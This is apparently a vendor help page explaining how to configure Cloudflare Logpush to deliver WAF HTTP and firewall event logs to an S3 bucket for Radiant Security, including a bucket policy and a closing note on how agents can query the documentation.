# Cloudflare WAF

In this guide, you will configure Cloudflare Logpush to forward HTTP and firewall events to Radiant Security via Amazon S3. Cloudflare WAF protects web applications from threats such as SQL injection, cross-site scripting (XSS), and DDoS attacks by inspecting and filtering traffic at the network edge. 

### Prerequisites

* [ ] An AWS account with permissions to create and modify S3 buckets, SNS topics, and IAM policies.
* [ ] Super Administrator access (or Log Share permissions) to the Cloudflare dashboard.
* [ ] An S3 bucket where Cloudflare will store logs (follow this AWS guide to create one: [Creating a general purpose bucket](https://docs.aws.amazon.com/AmazonS3/latest/userguide/create-bucket-overview.html)).
* [ ] Administrator role in Radiant Security

{% hint style="danger" %}
**Important note:** Cloudflare Logpush requires a Bucket Policy to allow Cloudflare to write to your bucket. (You generally do not need an Access Key/Secret Key for Cloudflare Logpush if using the recommended Bucket Policy method.)
{% endhint %}

### Configure Cloudflare WAF

Ensure that you have your S3 bucket information at hand. You must configure a Bucket Policy on your S3 bucket to allow Cloudflare to write logs to it. Please refer to Cloudflare's documentation on [Enable Amazon S3](https://developers.cloudflare.com/logs/logpush/logpush-job/enable-destinations/aws-s3/) for the required JSON policy.

### Configure Logpush integration

1. In the Cloudflare dashboard, go to the **Logpush** page at the account or domain level you want to monitor (also known as zone).
   * For account: [Go to Logpush](https://dash.cloudflare.com/?to=/:account/logs)
   * For domain (also known as zone): [Go to Logpush](https://dash.cloudflare.com/?to=/:account/:zone/analytics/logs)
2. Depending on your choice, you have access to [account-scoped datasets](https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/account/) and [zone-scoped datasets](https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/zone/), respectively.
3. Select **Create a Logpush job**.
4. In **Select a destination**, choose **Amazon S3**.
5. Enter or select the following destination information:
   * **Bucket:** S3 bucket name
   * **Path:** Bucket location within the storage container
   * **Organize logs into daily subfolders** (recommended)
   * **Bucket region**
   * If your policy requires [AWS SSE-S3 AES256 Server Side Encryption ↗](https://docs.aws.amazon.com/AmazonS3/latest/userguide/serv-side-encryption.html).
   * To **Grant Cloudflare access to upload files to your bucket**, you must apply a bucket policy ↗ (if you did not add it already):
     * Copy the JSON policy displayed on [this page](https://docs.aws.amazon.com/AmazonS3/latest/userguide/example-policies-s3.html#iam-policy-ex0), then go to your bucket in the Amazon S3 console and paste the policy in **Permissions** > **Bucket Policy**.
     * Click **Save**.

When you are done entering the destination details, select **Continue**.

6. To prove ownership, Cloudflare will send a file to your designated destination. To find the token, select the **Open** button in the **Overview** tab of the ownership challenge file, then paste it into the Cloudflare dashboard to verify your access to the bucket. Enter the **Ownership Token** and select **Continue**.
7. Select the dataset to push to the storage service, `http_requests` or `firewall_events` .  Since each Logpush job only pushes one dataset, setup a second Logpush job if you want both datasets.
8. In the next step, you need to configure your Logpush job:
   * Enter the **Job name**.
   * Under **If logs match**, you can select the events to include and/or remove from your logs. Refer to [Filters](https://developers.cloudflare.com/logs/logpush/logpush-job/filters/) for more information. Not all datasets have this option available.
   * In **Send the following fields**, you can choose to either push all logs to your storage destination or selectively choose which logs you want to push.
9. **Advanced Options** should be kept as default.
   * Warning: The **CVE-2021-44228 redaction option** in Cloudflare's Advanced Options replaces `${` with `x{`. Default is OFF, but if it is ON, Radiant cannot detect Log4Shell-style attacks because the pattern has been mangled at the source.
10. Select **Submit** once you are done configuring your Logpush job.

### Create and get access to an S3 bucket <a href="#create-and-get-access-to-an-s3-bucket" id="create-and-get-access-to-an-s3-bucket"></a>

Cloudflare uses Amazon Identity and Access Management (IAM) to gain access to your S3 bucket. The Cloudflare IAM user needs the `PutObject` permission for the bucket.

Logs are written into that bucket as gzipped objects using the S3 Access Control List (ACL) `Bucket-owner-full-control` permission.

{% hint style="info" %}
**Note:** For example, if you want to store logs in the bucket `burritobot` in the `logs` directory, the S3 URL would be `s3://burritobot/logs`
{% endhint %}

Ensure **Log Share** permissions are enabled, before attempting to read or configure a Logpush job. For more information refer to the [Roles](https://developers.cloudflare.com/logs/logpush/permissions/#roles) section.

To enable Logpush to Amazon S3:

1. Create an S3 bucket. Refer to Amazon's "Create an S3 bucket" documentation.
2. Edit and paste the policy below into **S3** > **Bucket** > **Permissions** > **Bucket Policy.**

{% hint style="info" %}
**Note:** Replace the `Resource` value with your own bucket path. The `AWS Principal` is owned by Cloudflare and should *not* be changed.
{% endhint %}

```json
{
  "Id": "<POLICY_ID>",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1506627150918",
      "Action": ["s3:PutObject"],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::<YOUR_BUCKET_NAME>/<YOUR_FOLDER>/*",
      "Principal": {
        "AWS": ["arn:aws:iam::391854517948:user/cloudflare-logpush"]
      }
    }
  ]
}
```

{% hint style="info" %}
**Note:** Logpush uses multipart upload for S3. Aborted uploads will result in incomplete files remaining in your bucket. To minimize your storage costs, Amazon recommends configuring a lifecycle rule using the `AbortIncompleteMultipartUpload` action. Refer to [Uploading and copying objects using multipart upload ↗](https://docs.aws.amazon.com/AmazonS3/latest/dev/mpuoverview.html#mpu-abort-incomplete-mpu-lifecycle-config).
{% endhint %}

### Configure S3 bucket for Radiant Security

Now that Cloudflare is configured to send logs to your S3 bucket, you need to configure the bucket to allow Radiant Security to collect the logs.

Follow the [Configure Amazon S3 to forward logs to Radiant Security](https://help.radiantsecurity.ai/~/revisions/922Q246ivW25E7jQi4sE/radiant-connectors/data-connectors/configure-amazon-s3-to-forward-logs-to-radiant-security) guide to:

1. Configure a bucket policy to allow Radiant Security read access.
2. Create and configure an SNS topic for event notifications.
3. Set up S3 event notifications for the folder prefix(es) you configured in Cloudflare.
4. Create the Amazon S3 Connector on Radiant Security.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://help.radiantsecurity.ai/radiant-connectors/data-connectors/cloudflare-waf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.